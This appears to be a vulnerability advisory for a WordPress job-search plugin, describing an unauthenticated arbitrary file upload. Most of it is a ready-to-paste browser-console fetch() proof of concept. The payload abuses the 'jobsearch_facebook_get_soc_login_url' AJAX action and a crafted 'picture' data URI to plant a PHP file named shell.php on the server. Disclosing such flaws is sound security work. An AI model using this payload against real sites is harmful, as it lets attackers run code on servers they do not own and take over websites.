Description The plugin does not validate files to be uploaded, which could allow unauthenticated attackers to upload arbitrary files such as PHP on the server
Navigate to the site, and paste the following in your browser's console:
fetch('/wp-admin/admin-ajax.php', {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
},
body: new URLSearchParams({
'action': 'jobsearch_facebook_get_soc_login_url',
'user_data': JSON.stringify({
"given_name": (Math.random()*0x1000).toFixed(),
"family_name": (Math.random()*0x1000).toFixed(),
"picture": "data:,<?php phpinfo(); //shell.php",
"name": (Math.random()*0x1000).toFixed(),
"email": (Math.random()*0x1000).toFixed(),
"id": (Math.random()*0x1000).toFixed(),
})
})
})
.then(response => response.text())
.then(data => console.log(data))
.catch(error => console.error('Error:', error));
Notice a new file named "shell.php" was uploaded to the site.